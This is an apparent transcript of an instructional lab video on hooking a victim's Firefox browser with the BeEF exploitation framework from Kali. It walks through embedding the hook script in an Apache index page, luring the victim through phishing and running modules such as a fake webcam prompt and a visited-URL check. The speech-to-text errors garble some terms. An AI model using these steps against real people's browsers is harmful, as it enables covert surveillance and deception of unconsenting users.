Greetings and initial video presentation, we're going to take a look at how we go about conducting a client side attack using the browser exploitation framework, commonly referred to as beef. Beef is short for browser exploitation framework. It is a penetration tool that focuses on the web browser. And unlike other security frameworks, V flicks past the hardened network perimeter and client system and examines exploitability within the context of the one true open door, the web browser, be equal hook one or more web browsers and use them as a beachhead for launching direct command modules and further attacks against the system from what's in the browser context. For this lab demonstration, I'll be using one virtual install of Cali 2.0 that's been updated and upgraded to the latest and the greatest running Apache web server and one Windows operating system with a fresh install of Firefox ESR browser Now you are free to use any version of Windows and browser that you choose fit.
But your results will differ depending on the security and how new and updated both are. Since beef comes pre installed with the latest version of Kali, there's nothing for us to download and install. We can launch the application V, a number of ways, but the most common two are using the applications that we can go up to exploitation tools, and we can launch from within here, or we can use the Cali quick launch, and we can launch it using the V fi icon, and that will open up the V pitch quotation framework. For this demonstration, I'm just going to use the shortcut that's in place inside of the Quick Launch Bar. I'm going to go ahead and just click it. This is going to open up the V services inside of the terminal.
Give it a chance to open up and when it comes back to the prompt, that means that too services for beep have been started, it is important that we read and understand everything that pops up inside of a terminal when we launch a service, because this is going to be our indicator whether or not the actual service started correctly, and everything is working as it should. And the same applies to B. So we know that B services have started. And now we have a couple of lines in here that we need to pay particular attention to. The first line we want to pay attention to is where it says a UI URL. Now this is the web page for the login to access the beef Management Console.
So we can go ahead and take another look at this. So it's telling you that to get to the beef log on page, you would use the loopback address and port 3004 slash UI for slash panel. And if we open up our browser, we see that this is the case the term hooking is used throughout this tutorial. hooking is the process of convincing our victim to click on a link that contains the JavaScript hook file. This JavaScript file will be processed by the victim's browser, tying the remote browser back to the V server. This is what is meant by the hooking process.
And if we look at our terminal, we see that the hook, the script that is going to allow the remote browser to hook back to our V server is given to us here. And we have a couple of things here we're going to have to modify and one of those is going to be the IP address. This is the IP address of our B server, or our Cali server or our Apache web server. They're all the same the three address but we have to modify this address in here. This little item here that has the IP between the brackets has to be replaced with actual IP address of the machine. So the next thing we want to do is discover what our actual IP address is for the beef.
Server. So to do this, we're just going to go up to our terminal, we're going to right click, and we're going to say open new window. Inside this new window, we're going to type in ifconfig. I am concerned with the IP address that is currently assigned to my Ethernet zero. And this is listed under the eye net. And we can see that I'm currently assigned the IP address of 192 dot 168 dot 145 dot one query.
Now I need to remember this because I'm going to use this later on to modify the path to the script. And that's the IP address that's going to go in here. If you launched a beef user interface and you do not see this log on screen, that means that your Firefox browser needs to be updated. And you're going to use the app dash get space upgrade space Firefox, that is our command to go ahead and get the latest version of Firefox ESR. Now that we have the IP address can go ahead and take the next step which is starting the Apache web server to do this, using the same terminal where we launched our beef framework, I have typed service space Apache to space start, I'm going to go ahead and just hit Enter. And if it comes back to the command prompt, we know that service started successfully.
B ties itself in with the Apache web service on our Kali machine, and it uses the default index dot HTML file. So we're going to have to go find this index dot HTML file and we're going to modify it. And we're going to change some text and we're going to put in the path for the hook. And we're going to try to entice our victim to visit this website so that they complete the hooking process and connect their browser back to our B server. To get to the index dot HTML file. We begin by going to the files icon inside of our quick launch.
Once this opens up, we're going to go Down to other locations. Next, we're going to click on computer. And underneath computer, we're going to click on the var directory. We're then going to click on the www directory. And finally, we're presented with the HTML directory. We'll open this up, and you'll see that we have an index dot HTML file.
Now we have to open up this index dot HTML file, and we're going to edit it using a text editor. To do this, I'm just going to right click, and I'm going to say open with other application. Now you'll see that I have the leafpad text editor available to me, but you may not. If you don't see a text editor, just go down where it says View all applications, and choose yourself a text editor. I'm gonna go ahead and say select and this opens up the index dot HTML file. Now you're going to see a lot different than what we see it here.
What you can do here is Modify the HTML inside of the document, leaving this part, the HTML tag at the top, the open head, and the title. And you can modify it with what you see here on the screen, this text, all of it is also available inside of the the lab file, you can just copy it and paste it into this index dot HTML file from the lab file. Now, you'll notice that that script, we're going to modify this here just a little bit. I'm gonna make this small bring up my terminal screen over here. And so you can see what I've done here. So this is the script that I need to put between the two header tags for the HTML building and the closing tags need to have this script in between.
So I'm going to go back over here, and we're going to open this up again. And you'll see where inside the script I took the IP in In the brackets, and I modified it with the IP address of my server. This is the IPA, I addressed that I discovered now your IP address is going to be different. So do not use this IP address, you have to discover your own IP address for your Apache web server, so that the client will know where to send the request for this JavaScript code. Now, once you have the HTML, correct inside of this index dot HTML file, you just go up to File, and then you can just select a save, and it'll close. We're now ready to proceed with the actual hooking of the clients browser back to our vi server.
For this next step, we're going to need to log on to the beef Management Console. So I'm going to bring that back up real quick. And we're going to log on with username of beef and the password of beef. all lowercase, again, the username and the password for the vif Management Console. Login or the authentication is the same deep, all lowercase. I'm gonna go ahead and log in.
Now, it's very important that you read this getting started page. There's a lot of good information in here. And it's going to explain a lot of good stuff to you. So as you see, I've already been playing around with the beat. And I already have one machine that I have hooked into my beef Management Console. What I'm going to do here is I'm going to go ahead and just open this up real quick.
And we're going to look at the commands. And I'm going to go down, and I'm going to remove the hook element, or I'm gonna say unhooked. And to do this. I'm going to say execute. And now my beef management console is going to go out and find my windows seven machine, and it should remove the hook that it established earlier with the Firefox browser. So we're going to go ahead and open up my browser here, and we're going to go ahead and begin launching this beef hooking process and see how it actually works.
So we're now back at my beef Management Console. And what we have here is a completely clean interface with no hook browsers. So I'm gonna go back to my Windows seven machine here. And let's see if I can pull this down and get over to the address. Yes, there it is, how I get the client to launch the web page where this JavaScript is hosted is up to my creativity. Normally, it would be some type of social engineering attempt at phishing email, or whatever the process is.
If you watch the video on how to exploit using Cali across the land, then you'll see that for us to make this actually work, we would have to have port forwarding enabled on our network. Now port forwarding was explained to that first video, so make sure you watch that so You'll understand better how this actually works in the real world. For this demonstration, we're just doing this on my local area network with my two machines seeing each other. So I'm gonna go ahead and select the web server that is hosting my beef service. And it goes back. And remember the HTML file that we modified.
That index dot HTML file is now present here inside of the remote user's browser. We injected the JavaScript code inside of the index dot HTML document between the two head tags, the beginning and the closing, which is where the JavaScript has to be present. This machine is now infected. That's all that's all the user had to do. All he had to do was just open up the web page. Again, how we entice the individual to get to the web page is up to our creativity.
It could be a phishing email. It could Say something that, hey, look at all the great pictures I took on my vacation. It posted up here on this website. Once the individual clicks on that URL for that website, and we have embedded that JavaScript hook, then their web browser becomes infected, and we have access to their machine. So now let's go back over and look at our Cali machine. And now we see that I do have the browser hook back over here to my beef.
So now I can communicate just by clicking on the IP address of that browser, where it's located underneath browsers. And we see that online browsers currently available to me. And if I click on it, I get the first tab that's available to me, which is the detail. It's very important that you understand what kind of a browser you're working with. So just keep looking at and understanding all the different aspects of what's going on with this browser. Because This is going to determine exactly what exploits you can launch against the browser.
Not every exploit is going to work because every browser is different. And every browsers update is going to block some certain exploits from not working. Once we understand what browser it is we're playing around with we put two, we can then go into the commands tab, and we can begin the exploitation process. Now these exploitation that you're seeing here, don't pertain directly to the Mozilla Firefox ESR. These are all the exploits that are available up inside of V. Now, if you remember on the getting start getting started page, we have some information about which of these exploits are deemed as feasible and which aren't. And the ones that are given the green light are most likely to work, but they may not.
There may be something that's not being done. acted correctly, that stopping the exploit from work. And so don't take it as the absolute truth that the exploit will work, it may work. And the same thing down here in the command module does not work against the target, or the command module works against target, but maybe visible to the user. There's a lot of things going on here that you want to understand with these different goal lights. Alright, so make sure you understand that, again, by just clicking on the IP address of our victims browser, we can get into the tabs that allow us to have the ability to the exploit.
So we're going to click on the commands tab now. And again, we're going to start off up here with the browser. So these are all the different exploits that we can take a look at. There's not a whole lot in here that's of interest to us the webcam, the webcam is not going to work. Because we don't have flash installed. We can still play around with it.
So I can click on this. And over here I can change the social engineer Kinda because this is what the user is going to see, this is what's going to pop up inside the browser. So I can say something like you've been hacked. Now, we got to make sure that we spell everything correctly, because we don't want to look totally illiterate. Someone type in the whole word here, you have been hacked. All right, then we can change this down here into something catchy, like, don't be a sore loser.
Go ahead and launch your webcam, give us some webcam, action, whatever you want to type in there. Let's go ahead and fill them some text. So I'm trying to convince the opposite end of this took whoever it is who's ever read this, to go ahead and play along and give me access to their webcam? pretty hard to do. Not everybody's as gullible as you think they are. But I'm just playing around with it here.
So you've been hacked. How about how Boston webcam action, blah, blah, blah. Now down here, you can go ahead and launch the website. exploit by just saying execute. When say execute, we go back on over to my Windows seven machine. And there's what we typed in.
So this could be something catchy, like a free ride or a free ticket or free airplane ticket, whatever it is, and I gotta go back and check my spelling, but you get the idea. So you can't, you can be creative with this. And if you can convince the individual to go ahead and play along, then get access to their webcam, or whatever it is you're trying to get access to. As you can see, there's a lot of different exploits available up inside of the beef Management Console. Another one that we can use as a pen tester is get the visited URLs. So if we're wondering if the user has been visiting some type of inappropriate sites, battle porn, gaming, gambling, whatever they might be, we can check for those sites up here.
Inside This particular exploit and then we just lost it. So I can just leave the project calm there. And we'll see if our browser has any record of this particular URL. I'll go ahead and say execute. Now all I have to do is come back over here to the module results history. And if I click on it, it comes back and it tells me that there is no record of a URL being visited called beef project Comm.
If you would like to know if the browser is susceptible to cross site scripting, you can go ahead and launch this tab here for the cross site scripting arrays. If you'd like to know more about the network, how we're actually connected, you can do that by going to the Network tab, it'll show you the path back to the victim. There's also the logs that are great for troubleshooting. But mostly, you're getting the idea that this is very intuitive. So using the beef work to exploit a someone browser, it's great, because this is the one open door that's available to us by way of the end users. So when the end user opens up their browser, the machine looks at it and says, hey, you're the end user, we're not going to deny you, if you want to go visit this website.
Great. We're going to go there for you. So if the end user clicks on that infected URL, and they come back over to our B server, they're going to pull down that JavaScript code that's going to complete the hook. So in conclusion, it's important that you understand not only what the VI framework is capable of doing, but its limitations. That concludes this short video presentation on how we go about creating a hook back to a remote browser using the beef exploitation framework. If you have any questions or you have any concerns about the contents of this video, please don't hesitate to reach out and contact your instructor.
And I'll see you in my next video.